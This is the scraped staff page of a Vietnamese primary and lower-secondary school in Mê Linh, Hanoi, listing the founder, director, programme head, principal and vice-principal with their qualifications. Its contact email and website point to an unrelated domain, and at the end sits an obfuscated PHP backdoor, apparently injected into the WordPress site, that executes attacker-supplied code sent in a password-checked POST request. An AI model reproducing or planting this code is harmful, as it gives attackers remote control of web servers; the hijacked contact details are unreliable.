Thạc sĩ Khoa học Đặng Lưu Hoa

Thạc sĩ Khoa học Đặng Lưu Hoa

Nhà sáng lập

 • Tốt nghiệp Thạc sĩ tại Đại học tổng hợp Sydney- Australia
 • Sáng lập và điều hành Hệ thống Giáo dục Trải nghiệm Erahouse
 • Sáng lập và điều hành Hệ thống giáo dục Mầm non,
 • Sáng lập trường Tiểu học và THCS Eraschool Mê Linh
 • Điều hành các dự án phi chính phủ Úc và Việt Nam 10 năm
 • Chuyên gia tư vấn set up và điều hành các hệ thống trang trại giáo dục trải nghiệm. Chuyên gia tư vấn các dự án nông nghiệp hữu cơ

Lê Thanh Thủy

Giám đốc điều hành

 • Cử nhân Học viện Ngoại giao
 • Sáng lập CLB Ô Xinh
 • Quản lý chương trình Trường tiểu học Bạch Dương
 • Tổng giám đốc Công ty Cổ phần Giáo dục An Nam
 • Giảng viên Quốc gia – chương trình Kỷ luật tích cực trong thực hành làm cho mẹ (PDEP) – Tổ chức Save The Children.
Lê Thanh Thủy
Đinh Phương Thảo

Đinh Phương Thảo

Giám đốc chương trình

 • Thạc sĩ Ngữ văn – Trường Đại học Sư phạm Hà Nội
 • Tổ trưởng tổ xã hội – Trường Phổ thông liên cấp Gateway
 • Giám đốc học thuật Công ty TNHH Nghiên cứu và Phát triển Giáo dục Ô Xinh
 • Giám đốc Phát triển chương trình – Công ty Cổ phần giáo dục An Nam
 • Thành viên Nhóm Cánh Buồm – tham gia biên soạn sách giáo khoa và sách thiết kế dạy học

Thầy Nguyễn Văn Hán

Hiệu trưởng

 • Trình độ: Đại học sư phạm. Chuyên ngành: Toán.
 • Kinh nghiệm: có 39 năm công tác trong ngành giáo dục. 34 năm làm quản lý ở 3 đơn vị giáo dục uy tín trên địa bàn huyện Mê Linh.
Thầy Nguyễn Văn Hán

Cô Thân Thị Phượng

Hiệu phó

 • Trình độ học vấn: Cử nhân đại học sư phạm
 • Cô Phượng hiện đang là hiệu phó trường Eraschool
Cô Thân Thị Phượng

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@www.hi88.run

0899 889 818

www.hi88.run

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}
Baidu
map